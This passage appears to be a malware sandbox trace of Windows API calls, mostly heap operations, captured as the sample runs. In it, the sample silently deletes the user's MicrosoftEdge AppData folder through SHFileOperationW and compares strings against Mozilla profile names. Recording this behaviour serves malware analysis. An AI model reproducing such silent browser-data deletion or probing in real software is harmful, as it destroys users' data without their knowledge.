hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0174.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0174.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0174.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0174.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0174.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0174.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0174.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0174.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5f900 [0174.051] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/MicrosoftEdge", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpFilePart=0x8cf650*="MicrosoftEdge") returned 0x2b [0174.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f900 | out: hHeap=0x2af0000) returned 1 [0174.051] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoftedge")) returned 0x10 [0174.051] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0174.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0174.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0174.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0174.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0174.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.621] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0174.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0174.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mozilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0174.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0174.622] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0174.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0174.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0174.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0174.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mozilla", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozilla", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0174.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0174.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0174.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0174.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0174.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0174.623] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 